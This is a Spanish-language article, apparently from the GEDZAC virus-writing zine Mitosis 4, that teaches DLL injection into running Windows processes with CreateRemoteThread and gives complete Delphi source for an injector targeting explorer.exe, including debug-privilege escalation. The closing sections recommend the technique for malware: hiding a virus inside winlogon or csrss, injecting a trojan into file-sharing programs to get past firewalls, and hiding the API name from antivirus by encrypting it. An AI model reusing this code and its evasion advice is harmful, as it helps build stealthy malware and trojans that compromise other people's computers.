<html>
<head>
<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1"><style type="text/css">
<!--
body,td,th {
	color: #FFFFFF;
}
body {
	background-color: #000000;
	SCROLLBAR-FACE-COLOR: #000000; 
	SCROLLBAR-HIGHLIGHT-COLOR: #0066cc; 
	SCROLLBAR-SHADOW-COLOR: #0066cc; 
	SCROLLBAR-3DLIGHT-COLOR: #000000; 
	SCROLLBAR-ARROW-COLOR: #0066cc; 
	SCROLLBAR-TRACK-COLOR: #000000; 
	SCROLLBAR-DARKSHADOW-COLOR: #000000

}
.style55 {font-family: "Courier New", Courier, monospace; font-size: 12px; }
.style62 {
	font-family: "Courier New", Courier, monospace;
	font-size: 14px;
	color: #0066CC;
	font-weight: bold;
	font-style: italic;
}
.style66 {color: #CCCCCC}
.Estilo4 {font-size: 14px; color: #FFFFFF; }
.Estilo5 {font-size: 18px; color: #FFFFFF; font-weight: bold; }
.Estilo6 {font-size: 14px; color: #00FF00; font-weight: bold; }
.Estilo8 {color: #0066FF}
.Estilo16 {font-size: 14px; color: #FFFFFF; font-weight: bold; }
.style143 {color: #999999}


-->

</style>
</head>

<body>

  <div align="left">
<p><span class="style55"><img src="../0x01.png" width="585" height="107"><bR>
      <span class="style66">#Inyecciones en procesos</span></span><span class="style55"><br>
      #Autor: <strong>Khronos[GEDZAC] <em>&lt;khronos[at]gedzac[dot]com&gt;</em></strong></span><br>
    </p>
</div>
  <div align="left" class="style55">
    <p align="justify">B&aacute;sicamente de lo que trata este art&iacute;culo es sobre la &ldquo;inyecci&oacute;n&rdquo; del c&oacute;digo de un ejecutable en un proceso remoto por medio de la funci&oacute;n de la API (Application Programming Interface) CreateRemoteThread.<br>
    </p>
    <p class="Estilo8">Inyectar una funci&oacute;n de la API de Windows en un proceso.</p>
    <p>En este sencillo ejemplo comprobaremos como funciona la funci&oacute;n CreateRemoteThread:<br>
    </p>
    <p><span class="style143">Var<br>
    MsgBox : function(hWnd: HWND; lpText, lpCaption: PWideChar; uType: UINT): Integer;<br>
    hProc: THandle;<br>
    Thread: DWORD;<br>
    Begin<br>
    MsgBox:= GetProcAddress(LoadLibrary('user32.dll'), 'MessageBoxW');<br>
    hProc:= OpenProcess(PROCESS_ALL_ACCESS, False, 1128);<br>
    CreateRemoteThread(hProc, nil, 0, @MsgBox, POINTER(0), 0, Thread);<br>
    End;</span><br>
    </p>
    <p align="justify">Expliquemos un poco el c&oacute;digo anterior: MsgBox es un puntero que apunta a la direcci&oacute;n de memoria de la function MessageBoxW en la librer&iacute;a user32.dll. hProc es el handle de un proceso cualquiera que abrimos en modo PROCESS_ALL_ACCESS.<br>
      Luego llamamos a la function CreateRemoteThread con los argumentos requeridos y se nos tendr&aacute; que abrir un MessageBox como este:<br>
    </p>
    <p align="justify"><span class="Estilo8">Inyectar una librer&iacute;a en un proceso</span><br>Para inyectar el c&oacute;digo de una librer&iacute;a (Dynamic Link Library) o biblioteca de enlace din&aacute;mico, utilizaremos el m&eacute;todo anterior y nos basaremos en la funci&oacute;n de la API de Windows LoadLibrary. Con la funci&oacute;n CreateRemoteThread inyectaremos en un proceso la function LoadLibrary pas&aacute;ndole como puntero la direcci&oacute;n de la dll que vamos a inyectar en el proceso.</p>
    <p align="justify">Empezamos creando el c&oacute;digo de nuestra librer&iacute;a:<br>
    </p>
    <p class="style143">library Proc;</p>
    <p class="style143">uses<br>
    Windows;</p>
    <p><span class="style143">begin<br>
    MessageBox(0, 'GEDZAC', '...', 0);<br>
    end.</span><br>
    </p>
    <p align="justify">Las librer&iacute;as no se pueden ejecutar como los ejecutables, pero si tienen una secci&oacute;n de c&oacute;digo que se ejecuta cuando las llamas con Rundll.exe o mediante la API LoadLibrary que vendr&iacute;a a ser lo mismo. Por ejemplo:<br>
        <br>
      Poniendo esto en la l&iacute;nea de commandos:	<strong>Rundll32.exe C:\Proc.dll, 0</strong><br>
    </p>
    <p align="justify">Ahora vamos a crear el ejecutable inyector de la librer&iacute;a de enlace din&aacute;mico en un proceso.<br>
    </p>
    <p>&nbsp;</p>
    <p>Program Inyector;</p>
    <p class="style143">{$SetPeFlags 1} <br>
  //S&oacute;lo versiones superiores al Delphi 2005, reduce el tama&ntilde;o del ejecutable<br>
    {$APPTYPE GUI}</p>
    <p class="style143">Uses<br>
    Windows;<br>
    </p>
    <p class="style143">function EnabledDebugPrivilege(const Enabled : Boolean) : Boolean;<br>
    var<br>
    hTk : THandle;<br>
    rtnTemp : Dword;<br>
    TokenPri : TOKEN_PRIVILEGES;<br>
    const<br>
    SE_DEBUG = 'SeDebugPrivilege';<br>
    begin<br>
    Result := False;<br>
    if (OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,hTk)) then<br>
    begin<br>
    TokenPri.PrivilegeCount := 1;<br>
    LookupPrivilegeValue(nil,SE_DEBUG,TokenPri.Privileges[0].Luid);</p>
    <p class="style143">if Enabled then<br>
    TokenPri.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED<br>
    else<br>
    TokenPri.Privileges[0].Attributes := 0;</p>
    <p class="style143">rtnTemp := 0;<br>
    AdjustTokenPrivileges(hTk,False,TokenPri,sizeof(TokenPri),nil,rtnTemp);</p>
    <p class="style143">Result := GetLastError = ERROR_SUCCESS;<br>
    CloseHandle(hTk);</p>
    <p class="style143">end;<br>
    end;<br>
    </p>
    <p class="style143">function GetProcessID(Exename: string): DWORD;<br>
    var<br>
    hProcSnap: THandle;<br>
    pe32: TProcessEntry32;<br>
    begin<br>
    result := 0;<br>
    hProcSnap := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0);<br>
    if hProcSnap &lt;&gt; INVALID_HANDLE_VALUE then<br>
    begin<br>
    pe32.dwSize := SizeOf(ProcessEntry32);<br>
    if Process32First(hProcSnap, pe32) = true then<br>
    begin<br>
    while Process32Next(hProcSnap, pe32) = true do<br>
    begin<br>
    if pos(Exename, pe32.szExeFile) &lt;&gt; 0 then<br>
    result := pe32.th32ProcessID;<br>
    end;<br>
    end;<br>
    CloseHandle(hProcSnap);<br>
    end;<br>
    end;<br>
    </p>
    <p class="style143">function InjectTo(const Host, Guest: string): DWORD;<br>
    var<br>
    hRemoteProcess: THandle; <br>
    dwRemoteProcessId: DWORD; <br>
    memSize: DWORD; <br>
    pszLibFileRemote: Pointer;<br>
    iReturnCode: Boolean;<br>
    TempVar: DWORD;<br>
    pfnStartAddr: TFNThreadStartRoutine;<br>
    pszLibAFilename: PwideChar;<br>
    begin<br>
    Result := 0;<br>
    EnabledDebugPrivilege(True);<br>
    Getmem(pszLibAFilename, Length(Guest) * 2 + 1);<br>
    StringToWideChar(Guest, pszLibAFilename, Length(Guest) * 2 + 1);<br>
    dwRemoteProcessID:=GetProcessId(host);</p>
    <p class="style143">hRemoteProcess := OpenProcess(PROCESS_CREATE_THREAD + PROCESS_VM_OPERATION +<br>
    PROCESS_VM_WRITE,<br>
    FALSE, dwRemoteProcessId);</p>
    <p class="style143">memSize := (1 + lstrlenW(pszLibAFilename)) * sizeof(WCHAR)*2;</p>
    <p class="style143">pszLibFileRemote := PWIDESTRING(VirtualAllocEx(hRemoteProcess, nil, memSize, MEM_COMMIT, PAGE_READWRITE));<br>
    TempVar := 0;<br>
    iReturnCode := WriteProcessMemory(hRemoteProcess, pszLibFileRemote, pszLibAFilename, memSize, TempVar);<br>
    if iReturnCode then<br>
    begin<br>
    pfnStartAddr := GetProcAddress(GetModuleHandle('Kernel32'), 'LoadLibraryW');<br>
    TempVar := 0;<br>
    Result := CreateRemoteThread(hRemoteProcess, nil, 0, pfnStartAddr, pszLibFileRemote, 0, TempVar);<br>
    end;</p>
    <p class="style143">Freemem(pszLibAFilename);<br>
    end;<br>
    </p>
    <p><span class="style143">//Inicio del programa<br>
    begin<br>
    InjectTo(&lsquo;explorer.exe&rsquo;, &lsquo;C:\Proc.dll&rsquo;);<br>
    end.</span><br>
    </p>
    <p>&nbsp;</p>
    <p>&nbsp;</p>
    <p align="justify"><span class="style143">Explicaci&oacute;n del c&oacute;digo:</span><br>
      La funci&oacute;n InjectTo carga mediante la API de Windows LoadLibrary una librer&iacute;a de enlace din&aacute;mico en un nuevo Thread dentro de un proceso. Recomiendo que se busque informaci&oacute;n en MSDN sobre cada una de las funciones de la API de windows que empleo.. Lo que hago es reservar espacio en la memoria de un proceso para poder crear el nuevo Thread, que va a ser nuestra dll.<br>
    </p>
    <p align="justify">Utilidad de las inyecciones de memoria.</p>
    <p align="justify">Pues bien, la posibilidad m&aacute;s clara que vemos a simple vista es que conseguimos que nuestro virus sea invisible en el TaskManager, recomiendo que se emple la API CreateRemoteThread con el proceso winlogon o csrss, ya que en ning&uacute;n momento se van a poder detener esos procesos porque son vitals para el Sistema Operativo.</p>
    <p align="justify">Otra posibilidad que no se ve a simple vista y que es muy interesante es la de crear un troyano que emplee esta t&eacute;cnica. El virus se encargar&iacute;a de encontrar procesos como Ares.exe, eMule.exe, Kazaa.exe o cualquier otro programa que funcione como servidor en un pc, y cuando los encuentre inyectar&aacute; el c&oacute;digo del troyano en &eacute;l.<br>
      El problema de los troyanos es que cualquier FireWall los detecta cuando se ponen a escuchar a trav&eacute;s de un puerto y la &uacute;nica forma de evitar que nos parara el firewall era desactivandolo. El Firewall de Windows tiene mil formas de desactivarlo, pero el de los antivirus no. Que es m&aacute;s f&aacute;cil, &iquest;crear un virus que desactive todos los firewall del mercado?  o &iquest;uno que se los salte todos utilizando otro programa de chivo espiatorio?</p>
    <p align="justify">La primera opci&oacute;n es la ideal, pero es inviable y la segunda es muy efectiva y la puedes conseguir f&aacute;cilmente. Pero eso ya no entra dentro de este art&iacute;culo.</p>
    <p align="justify">Recomendaci&oacute;n: La API CreateRemoteThread es detectada por los antivirus por lo tanto la soluci&oacute;n ser&iacute;a cargarla din&aacute;micamente con GetProcessAddress y cifrando su indentificador:<br>
    </p>
    <p><span class="style143">Var<br>
    pThread: function (hProcess: THandle; lpThreadAttributes: Pointer;<br>
    dwStackSize: DWORD; lpStartAddress: TFNThreadStartRoutine; lpParameter: Pointer;<br>
    dwCreationFlags: DWORD; var lpThreadId: DWORD): THandle;<br>
    begin<br>
    pThread:= GetProcAddress(LoadLibrary('kernel32'), 'CreateRemoteThread');<br>
    end;</span><br>
    </p>
    <p align="justify">Ser&iacute;a algo as&iacute; aunque el string &lsquo;CreateRemoteThread&rsquo; lo tendr&iacute;amos cifrado.<br>
    </p>
    <p align="justify">Bueno aqu&iacute; se termina este manual, espero que te haya sido utilidad. Cualquier duda o consejo a mi mail.<br>
    </p>
    <p align="right" class="style62">(C) Mitosis 4 - GEDZAC LABS</p>
</div>
</body>
</html>
